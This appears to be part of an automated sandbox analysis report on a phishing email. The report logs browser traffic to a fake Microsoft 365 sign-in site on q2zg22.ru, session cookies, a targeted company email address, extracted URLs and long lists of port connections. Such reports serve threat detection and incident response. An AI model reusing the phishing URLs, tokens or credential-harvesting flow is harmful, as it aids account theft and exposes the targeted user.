?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://office.q2zg22.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c; OParams=11O.Dqw7oMsnFRnIYqspcJbLIxKcamHyh9DSRrFQOg*Nk4BEID!tb86nwfFa41HP2PuAWs7t532JlwT6iqJhWGq3yuFIbenSo0UYE498Wf!KHCgLFDdDlQwdw2otFPT37WRzMLYo1ruiulbbhYr2kSBHpqXF1CIhhQJJaP*qA6IT80ZVTMByHul7ZkgnaNslrXLPMP0OM9mm6eQ*Zvk083BpRBi8JiucY81cU*1fHZ4pmzX!hKwqprOajzkT!GvWa4x5Ku7fIS*uaF8iAMfDDOKpmUgNscGdv9tSvkVXPmKRAfv08tIGcxzGG9!ahvrMKIAMwrmsUUc8dRUeyXwg6CtZxLWJW340n4b5!LZGRO1zT6VmRwB*nDwDYJLCwad06trcy5SNpBBLG59ODeo9MX5WDUfphgKUGMP50BJDdBVZ**GrCW871F4RKw412LyURsbTkk4oLv7kLw2XQbUkcPCiRtp8xiqxeYj2gqBd8XDQi5u0lrHh9Hqiotr4Iom7*GEiwPKusojvkDSUprLsgnm6E52UJ53S9q2PTgu7LH8tGaYIMXmFLWweEbHPqRJtB*N8kGkHcldoFXqx8mxCqq9mX2OKrCNhlE8oFgcHuS3hrRe3dao22d2lhKvpeAT8Ztj54Wml7e3tVbCL!kDmwyjh4ZoFBfAoa5nq4XnhZOTn2Yk3O2mLypSQQ80Jk*8TUk!9mcF5N6952ZYZZMkbIWNQ*VuOsb4mRwzJHd3wQGe8fCRxxwwQBIQtWBVcYTiYwcf4xVogI2eL!eCB*guT2JeJw2LRko5PdH3cL6FNZH3o9E!sLmZ4decOkrMJqb8I2ObA2yuWXIAfgeZ
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; MSPRequ=id=N&lt=1706901509&co=2; uaid=a2d3a70537194180a89ad819ae49ee07; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c$uuid-1e3c4a5a-7c47-4a5e-b0f8-b6d22ca50e38; OParams=11O.Dv1KRcnHf!xH6UwRUxn8M1e5h77BdbYn6hdK0gwn7LCdt!haiV7d64HR4jnzkKozZVT0z2DsR7iQ7iCc8dS1i!Ly3Qth6ucAcKNaM8UoimL2za5*oPcRzXngmwcdeuzLWNAw5yvQbG!st2sFU3PvSZ73FzaMM*OGNVWpQ9E72PDKFb0covOYaAzEhDEXejYKYFjl7efhXZvCd6XFZpQTtUK97ojpHJWkmEEfyqzBIdAM08!1P8jaR0Tqif1FYTralGf4qAdd0IF2LBtGUmyqG2a9MDLvw6GmqBak!G8XyHi78llhEKo2XlzTPKxkiCPG7DvySvD*DLV78VwB6!yp*J8PJyO4cE4qrcnzIs1Xn2Dr1yNaRw28qaJ1w44DxwvSqmOqe8JuFZ04VM3EIItHYscocPyT4ax2EXJRw5gs*MkJ4ZdlWqIE*TomuOiAKsjaueYu2BIXvOUfI4G0*CO181MUjnlmj4zfZIQvBZIOCrTjm*ZFKvz512vDLE!EUtqtE6rYTizAMaFwByzhFHdDJmpXFyCvNFlKqjLhBfRe2prZ4BBx!zAldUcX9tV9BD9RN5mCAqmpuiUUPA2lopywS0m2bHKu!DUI3IPTaPTo7Qy
              Source: global trafficHTTP traffic detected: GET /s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js HTTP/1.1Host: ywnjb.q2zg22.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=a2d3a70537194180a89ad819ae49ee07&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-wPnKDyEAN_-6_8G41fz1PZOuL_1y9VtFP9t7p5gKipKKkELpLDxD2Rb7BLgS6h8Soay21wXTavcrc02E4yhCuHro0M9AvwBh2rBqhWv2_UozUSmdABAVrgZtx9AirQKvOQbYZGv_tKnDBJnro-7F_HgAANox4NGPRLIGMSuESBuxG8f2BFJIZEtbl3BqgvaQaY4NjmYaKcMNXs_n1rWbgyAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: ae23-8632=afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04; MUID=2E6F22D2EA936CD30EE836CBEBB26D97; cf_clearance=DGVCDqJo4p8HXwiT2d9w7JleZ4qt8BY6c2qPP4YgtPs-1706901470-1-Acw5T7KtW0gzkNpwcfV200Vk3xmGo+jR5De1FJxtB8nNFB0tvSoBxYcHLUPxaQHxfbpp+xPD48APvvJqR81dSEE=; MSCC=143.110.219.151-CA; MicrosoftApplicationsTelemetryDeviceId=72c0f85c-d0f5-4e37-bf7f-5d43c41b787c; ai_session=pzuSdwV0qlEhCs1mb9CtVq|1706901479212|1706901479212; MSPRequ=id=N&lt=1706901509&co=2; uaid=a2d3a70537194180a89ad819ae49ee07; MSPOK=$uuid-feea05ca-1408-49c9-a001-ad97673e736c$uuid-1e3c4a5a-7c47-4a5e-b0f8-b6d22ca50e38; OParams=11O.Dv1KRcnHf!xH6UwRUxn8M1e5h77BdbYn6hdK0gwn7LCdt!haiV7d64HR4jnzkKozZVT0z2DsR7iQ7iCc8dS1i!Ly3Qth6ucAcKNaM8UoimL2za5*oPcRzXngmwcdeuzLWNAw5yvQbG!st2sFU3PvSZ73FzaMM*OGNVWpQ9E72PDKFb0covOYaAzEhDEXejYKYFjl7efhXZvCd6XFZpQTtUK97ojpHJWkmEEfyqzBIdAM08!1P8jaR0Tqif1FYTralGf4qAdd0IF2LBtGUmyqG2a9MDLvw6GmqBak!G8XyHi78llhEKo2XlzTPKxkiCPG7DvySvD*DLV78VwB6!yp*J8PJyO4cE4qrcnzIs1Xn2Dr1yNaRw28qaJ1w44DxwvSqmOqe8JuFZ04VM3EIItHYscocPyT4ax2EXJRw5gs*MkJ4ZdlWqIE*TomuOiAKsjaueYu2BIXvOUfI4G0*CO181MUjnlmj4zfZIQvBZIOCrTjm*ZFKvz512vDLE!EUtqtE6rYTizAMaFwByzhFHdDJmpXFyCvNFlKqjLhBfRe2prZ4BBx!zAldUcX9tV9BD9RN5mCAqmpuiUUPA2lopywS0m2bHKu!DUI3IPTaPTo7QyNhGDJmgUQ7S35TuSDBv6R946oPZMycmZZV6cp9DDcNkBX6qs!eUKw58tER6JJgjJa
              Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000A77D70936C HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
              Source: unknownDNS traffic detected: queries for: sushishop.commander1.com
              Source: unknownHTTP traffic detected: POST /RST2.srf HTTP/1.0Connection: Keep-AliveContent-Type: application/soap+xmlAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})Content-Length: 3592Host: login.live.com
              Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://augloop.office.com/settings.json
              Source: chromecache_126.6.drString found in binary or memory: http://feross.org
              Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
              Source: chromecache_125.6.dr, chromecache_108.6.drString found in binary or memory: http://knockoutjs.com/
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: http://thumbnail=5Fdocusign.png/
              Source: chromecache_125.6.dr, chromecache_108.6.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
              Source: App1706901443419558900_339ECE70-F791-4C73-BA10-ACB54261FBCD.log.0.drString found in binary or memory: https://augloop.office.com
              Source: chromecache_125.6.dr, chromecache_108.6.dr, chromecache_126.6.dr, chromecache_132.6.dr, chromecache_110.6.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
              Source: chromecache_105.6.drString found in binary or memory: https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://nam-sonar.atp.protection.outlook.com/sonarapi=3Fcon?=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.?=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commande?=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commander1.com/c3=3Ffirstti?=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commander1.com/c3=3Ffirsttime?=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commander1.com/c3?=
              Source: ~WRS{51F6B9FC-CB2E-4D7B-B14D-FEA48266E42B}.tmp.0.drString found in binary or memory: https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commander1.com/c3?firsttime=3D1&tcs=3D2478&=
              Source: dudick SystemDesk Important Crediential Notification 1.emlString found in binary or memory: https://sushishop.commander1.com/c?=
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
              Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
              Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
              Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
              Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
